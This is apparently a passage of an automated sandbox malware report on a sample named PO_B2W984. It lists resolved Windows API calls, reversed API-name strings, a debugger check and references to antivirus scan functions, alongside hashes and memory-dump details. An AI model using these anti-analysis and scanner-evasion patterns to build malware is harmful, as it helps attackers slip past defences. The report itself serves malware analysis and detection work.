                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DE8113
                                                                                                                                        • GetProcAddress.KERNEL32(?,?), ref: 02DE8125
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                                        • String ID: Kernel32$sserddAcorPteG
                                                                                                                                        • API String ID: 667068680-1372893251
                                                                                                                                        • Opcode ID: 1509e3dce2a7cdc65b67c770ff813fc4f47fb22f27b63ebf5d16495811cb65a1
                                                                                                                                        • Instruction ID: 11256c3d6457e9cffeff4cace63bec92106e4ec726d2e13fc57ba84c4d98d7e4
                                                                                                                                        • Opcode Fuzzy Hash: 1509e3dce2a7cdc65b67c770ff813fc4f47fb22f27b63ebf5d16495811cb65a1
                                                                                                                                        • Instruction Fuzzy Hash: 95016238A80708AFEB01FFA5EC45E9E77AEEB49710F924468F405D7710DA70AD009A74
                                                                                                                                        Function 02DDA9D0 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetThreadLocale.KERNEL32(?,00000000,02DDAA67,?,?,00000000), ref: 02DDA9E8
                                                                                                                                          • Part of subcall function 02DDA744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02DDA762
                                                                                                                                        • GetThreadLocale.KERNEL32(00000000,00000004,00000000,02DDAA67,?,?,00000000), ref: 02DDAA18
                                                                                                                                        • EnumCalendarInfoA.KERNEL32(Function_0000A91C,00000000,00000000,00000004), ref: 02DDAA23
                                                                                                                                        • GetThreadLocale.KERNEL32(00000000,00000003,00000000,02DDAA67,?,?,00000000), ref: 02DDAA41
                                                                                                                                        • EnumCalendarInfoA.KERNEL32(Function_0000A958,00000000,00000000,00000003), ref: 02DDAA4C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4102113445-0
                                                                                                                                        • Opcode ID: 28620eb6c11330bf6ed9ece8ef926840c24c307d13d603a6096a008084197723
                                                                                                                                        • Instruction ID: 1525f4d93ddf092c19e3bdd10f747269e365ba0347e4dd75efc2e3f8d6ef7d00
                                                                                                                                        • Opcode Fuzzy Hash: 28620eb6c11330bf6ed9ece8ef926840c24c307d13d603a6096a008084197723
                                                                                                                                        • Instruction Fuzzy Hash: 7C01F234244E846BF701A678ED12B6E735DDB46720FD192A0F500A6BC0E664EE008AF4
                                                                                                                                        Function 02DDAA80 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetThreadLocale.KERNEL32(?,00000000,02DDAC50,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02DDAAAF
                                                                                                                                          • Part of subcall function 02DDA744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02DDA762
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Locale$InfoThread
                                                                                                                                        • String ID: eeee$ggg$yyyy
                                                                                                                                        • API String ID: 4232894706-1253427255
                                                                                                                                        • Opcode ID: d61eae29b3a91cbf0216159668a74a3234988c1dc5f3964d4d802aba6037ced8
                                                                                                                                        • Instruction ID: 618ab050018f2737e07ea48deee6f68f20cae5eba9ffea4b6d3deb0f2d368d4c
                                                                                                                                        • Opcode Fuzzy Hash: d61eae29b3a91cbf0216159668a74a3234988c1dc5f3964d4d802aba6037ced8
                                                                                                                                        • Instruction Fuzzy Hash: 8E41E538708E495BD711EB7C88807BEB3EBDB85214F54C925E4A2D7344EA78ED06CA71
                                                                                                                                        Function 02DE8018 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DE8088,?,?,00000000,?,02DE79FE,ntdll,00000000,00000000,02DE7A43,?,?,00000000), ref: 02DE8056
                                                                                                                                          • Part of subcall function 02DE80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DE8148,?,?,00000000,00000000,?,02DE8061,00000000,KernelBASE,00000000,00000000,02DE8088), ref: 02DE810D
                                                                                                                                          • Part of subcall function 02DE80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DE8113
                                                                                                                                          • Part of subcall function 02DE80C0: GetProcAddress.KERNEL32(?,?), ref: 02DE8125
                                                                                                                                        • GetModuleHandleA.KERNELBASE(?), ref: 02DE806A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandleModule$AddressProc
                                                                                                                                        • String ID: AeldnaHeludoMteG$KernelBASE
                                                                                                                                        • API String ID: 1883125708-1952140341
                                                                                                                                        • Opcode ID: e70d8d0971d31a3371130c52ca317d611a2403c1ab5d515e004fd14d6274749c
                                                                                                                                        • Instruction ID: 093fb90bfd7018cfb1f3e9a15ea78aca126e4ab2591602e2fea6822a1c3b0e81
                                                                                                                                        • Opcode Fuzzy Hash: e70d8d0971d31a3371130c52ca317d611a2403c1ab5d515e004fd14d6274749c
                                                                                                                                        • Instruction Fuzzy Hash: 82F0CD34680708AFEB00FBA0EC4295A77ADEB09B40BA20960F401D7B10D730AE409A60
                                                                                                                                        Function 02DEEB8C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleW.KERNEL32(KernelBase,?,02DEEF90,UacInitialize,02E3137C,02DFAFD0,UacScan,02E3137C,02DFAFD0,ScanBuffer,02E3137C,02DFAFD0,OpenSession,02E3137C,02DFAFD0,ScanString), ref: 02DEEB92
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02DEEBA4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                        • String ID: IsDebuggerPresent$KernelBase
                                                                                                                                        • API String ID: 1646373207-2367923768
                                                                                                                                        • Opcode ID: fd4e67f709381d81afc277589ad1826bc8631dcfebc99d3470d1c2692fa05e2a
                                                                                                                                        • Instruction ID: 4cb7fabfc7d0d406e8865a9bbf690240f32201b5ee7c8d2bf5c8969c47ac9063
                                                                                                                                        • Opcode Fuzzy Hash: fd4e67f709381d81afc277589ad1826bc8631dcfebc99d3470d1c2692fa05e2a
                                                                                                                                        • Instruction Fuzzy Hash: 7CD01265355B501DFD0075F42CC4C1F03CDC50553D7240EA0F023D53D1E566CC1555A1
                                                                                                                                        Function 02DDC3F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,?,02DFC10B,00000000,02DFC11E), ref: 02DDC3FA
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02DDC40B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                        • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                                        • API String ID: 1646373207-3712701948
                                                                                                                                        • Opcode ID: 51492abd61497bed38e5f22b4d06c31cc6b9e718cc09a34bc38bdeea0171892d
                                                                                                                                        • Instruction ID: 30edc41cb4eaae3313a2b7a15c5354b433482dfb547465d61327d42c85074d35
                                                                                                                                        • Opcode Fuzzy Hash: 51492abd61497bed38e5f22b4d06c31cc6b9e718cc09a34bc38bdeea0171892d
                                                                                                                                        • Instruction Fuzzy Hash: 76D05E60A90B404AFB406FB1F881B3E2789C308706F005866E50155301D761BC18CFA8
                                                                                                                                        Function 02DDE168 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02DDE217
                                                                                                                                        • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02DDE233
                                                                                                                                        • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02DDE2AA
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 02DDE2D3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 920484758-0
                                                                                                                                        • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                                        • Instruction ID: 2201f2dad33885c5acaccf4a46a6f55aa7258faf2001d9bfcf618f5a0d00381f
                                                                                                                                        • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                                        • Instruction Fuzzy Hash: 2B41EC76A01A299FCB61DB58CC90BD9B7BDEF49314F0041D5E649AB351DA30AF84CF60
                                                                                                                                        Function 02DDACBC Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02DDACD9
                                                                                                                                        • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02DDACFD
                                                                                                                                        • GetModuleFileNameA.KERNEL32(02DD0000,?,00000105), ref: 02DDAD18
                                                                                                                                        • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02DDADAE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3990497365-0
                                                                                                                                        • Opcode ID: c51654078bb91ab2b86d5e75dc36c4a44776b50aa88997b9ca3390c153871f84
                                                                                                                                        • Instruction ID: 92497a2f8ce08ef025fd067505cf80cc04ee3578e59dcb5a815569d47ebae278
                                                                                                                                        • Opcode Fuzzy Hash: c51654078bb91ab2b86d5e75dc36c4a44776b50aa88997b9ca3390c153871f84
                                                                                                                                        • Instruction Fuzzy Hash: 42410874A406589BDB61EB68DC84BDAB7FDAB08301F4440EAA548E7341DB749F84CF60
                                                                                                                                        Function 02DDACBA Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02DDACD9
                                                                                                                                        • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02DDACFD
                                                                                                                                        • GetModuleFileNameA.KERNEL32(02DD0000,?,00000105), ref: 02DDAD18
                                                                                                                                        • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02DDADAE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3990497365-0
                                                                                                                                        • Opcode ID: 71aed838403eb56ec35dc60e1e75c5956a45fc85ada51514543b1ceeeb523b9a
                                                                                                                                        • Instruction ID: 1de8cafe341cb88f7058ebed6b6c6a075f54f9465ebf8adfcc0b4afb20cf9513
                                                                                                                                        • Opcode Fuzzy Hash: 71aed838403eb56ec35dc60e1e75c5956a45fc85ada51514543b1ceeeb523b9a
                                                                                                                                        • Instruction Fuzzy Hash: FF411B74A406589BDB61EB68DC84BDAB7EDAB08301F4440E5A548E7341DB74DF84CF60
                                                                                                                                        Function 02DD1C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: e521871343254065e45c700f33ba3cc7b3fe5a96b7033b4af9025dd56d61c81d
                                                                                                                                        • Instruction ID: 86d2b262da8fd69072b3039c9bdb74062cf9764f45fcc0a0396d7bffa377bb15
                                                                                                                                        • Opcode Fuzzy Hash: e521871343254065e45c700f33ba3cc7b3fe5a96b7033b4af9025dd56d61c81d
                                                                                                                                        • Instruction Fuzzy Hash: A2A1E567750A100BE728AA7D9D803ADB3D6DBC4225F1C427EE11DCB3C5EB68DD46C650
                                                                                                                                        Function 02DD946C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02DD955A), ref: 02DD94F2
                                                                                                                                        • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02DD955A), ref: 02DD94F8
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DateFormatLocaleThread
                                                                                                                                        • String ID: yyyy
                                                                                                                                        • API String ID: 3303714858-3145165042
                                                                                                                                        • Opcode ID: d41cad2ab444d3f341dfa72002a16f72a4d9c4ef6914fb3a6fad32e669ae669b
                                                                                                                                        • Instruction ID: 5544c8d1a03cc90dc07b0b30af8e82ca875e5ff3697b33eaab261fddee347ebf
                                                                                                                                        • Opcode Fuzzy Hash: d41cad2ab444d3f341dfa72002a16f72a4d9c4ef6914fb3a6fad32e669ae669b
                                                                                                                                        • Instruction Fuzzy Hash: 90216B75A00A18AFDB10DFA8C851AEEB3B9EF08710F4100A5E949E7340D731EE40CFA5
                                                                                                                                        Function 02DE8184 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02DE8018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DE8088,?,?,00000000,?,02DE79FE,ntdll,00000000,00000000,02DE7A43,?,?,00000000), ref: 02DE8056
                                                                                                                                          • Part of subcall function 02DE8018: GetModuleHandleA.KERNELBASE(?), ref: 02DE806A
                                                                                                                                          • Part of subcall function 02DE80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DE8148,?,?,00000000,00000000,?,02DE8061,00000000,KernelBASE,00000000,00000000,02DE8088), ref: 02DE810D
                                                                                                                                          • Part of subcall function 02DE80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DE8113
                                                                                                                                          • Part of subcall function 02DE80C0: GetProcAddress.KERNEL32(?,?), ref: 02DE8125
                                                                                                                                        • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02DE820E), ref: 02DE81F0
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                                                                                                                        • String ID: FlushInstructionCache$Kernel32
                                                                                                                                        • API String ID: 3811539418-184458249
                                                                                                                                        • Opcode ID: 041d6dc48df99817044ee7849c431646d9c8e785dec64439d378d18603545887
                                                                                                                                        • Instruction ID: 61477d4ea28a5b937efcf6765db714866252e171a0ab95eb23ae0cd9dd92e78e
                                                                                                                                        • Opcode Fuzzy Hash: 041d6dc48df99817044ee7849c431646d9c8e785dec64439d378d18603545887
                                                                                                                                        • Instruction Fuzzy Hash: 8601AD34680A08AFEB00EFE4DC42F5A77ADEB08B00FA28460F505D7750CA30AD009A30
                                                                                                                                        Function 02DEAD5C Relevance: 5.1, APIs: 4, Instructions: 72COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • IsBadReadPtr.KERNEL32(?,00000004), ref: 02DEAD90
                                                                                                                                        • IsBadWritePtr.KERNEL32(?,00000004), ref: 02DEADC0
                                                                                                                                        • IsBadReadPtr.KERNEL32(?,00000008), ref: 02DEADDF
                                                                                                                                        • IsBadReadPtr.KERNEL32(?,00000004), ref: 02DEADEB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Read$Write
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3448952669-0
                                                                                                                                        • Opcode ID: a93baf0632f810e868fc304dc02f88cb2819ea7b8e0cd4cec62af5963c9676e9
                                                                                                                                        • Instruction ID: 0a08da1231fc58b1f55a923e2a03dca3185aa22419a5b1f58e574c8caef92c20
                                                                                                                                        • Opcode Fuzzy Hash: a93baf0632f810e868fc304dc02f88cb2819ea7b8e0cd4cec62af5963c9676e9
                                                                                                                                        • Instruction Fuzzy Hash: 2421AFB164061A9BDF10EF29CC80BAE77A9EF40722F008251EE5197380EB34ED11DAE0

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:4.2%
                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                        Signature Coverage:3%
                                                                                                                                        Total number of Nodes:1828
                                                                                                                                        Total number of Limit Nodes:67
